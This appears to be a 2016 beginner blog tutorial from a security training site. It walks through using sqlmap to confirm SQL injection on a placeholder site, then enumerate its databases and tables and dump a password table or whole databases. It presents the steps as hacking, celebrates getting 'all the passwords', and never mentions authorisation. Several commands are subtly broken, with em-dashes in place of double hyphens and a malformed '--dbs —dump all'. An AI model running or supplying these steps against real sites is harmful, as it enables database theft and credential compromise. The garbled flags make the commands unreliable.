Call Us : +91-771045-0011 | +91-771045-0022

BEGINNERS GUIDE TO EXTRACT DATABASE OF WEBSITES via SQLmap

2016-09-06

Category : Information security Management

INTRODUCTION:-

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable website ,sqlmap can exploit database and do a lot of hacking like getting username and passwords etc. Under certain conditions it can even read and write files on the server.


INSTALLING THE TOOL:-



  • Since its written in python, first you have to install python on your system.
  • Then you have to download sqlmap via internet from their website “www.sqlmap.org”.
  • Download the zip or tar file and open it.
  • inside the folder u will see a python with the name "sqlmap.py".
  • drag it into the terminal and press enter.
  • if everyhting done right, sqlmap will start.


HOW IS IT POSSIBLE?

Because the developer of that site did not properly escape the parameter id.

Now we will assume that there is a website that has a url in it like this:-

http://www.vulnerable.com/subcat.php?id=5

and it is prone to sql injection () This can be easily be tested by opening the url by adding a single quote(’) at the end. 

http://www.vulnerable.com/subcat.php?id=5'

if the site reacts in an unusual way or shows an error it simply means that the site is vulnerable.


LETS GET ON TO IT. SHALL WE:-

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal 

type :-  sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5”


The above is the first command to run with the sqlmap tool. It checks if the site is vulnerable to sql injection or not. Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exists. 

The "--dbs" option is used to get the database list.

type:-  sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” --dbs


this will tell u the names of databases (folders) in the server’s hard drive (for this situation the database names are confidential and  info)

now as we know that the database is saved in the form of table and columns (just like excel), we can see the table names in the folder we just got the names of, by using this command

type:-  sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” —tables -D confidential


This will show us the names of the tables in that database. suppose there is a table by the name “password”(now that is something interesting and confidential).

GETTING THE EVERYTHING:-

Now comes the most interesting part of extracting the data from the server. 

type:-  sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” —dump -D confidential -T                      password

congratulations u got all the passwords.


OR

also what u can do is that u can dump all the database of the website using the command

type:-  sqlmap.py -u “http://www.vulnerable.com/subcat.php?id=5” --dbs —dump all





Contact Us

+91-771045-0011

Request more information

suggested for you

Proudly Operated from India

© 2016 Copyrights. All Rights Reserved

See more of Cyber Intelligence by logging in.
Connect with cyber security experts,Discover job opportunities,Online Training, Information Security Advisory and lot more.

Sign Up Log In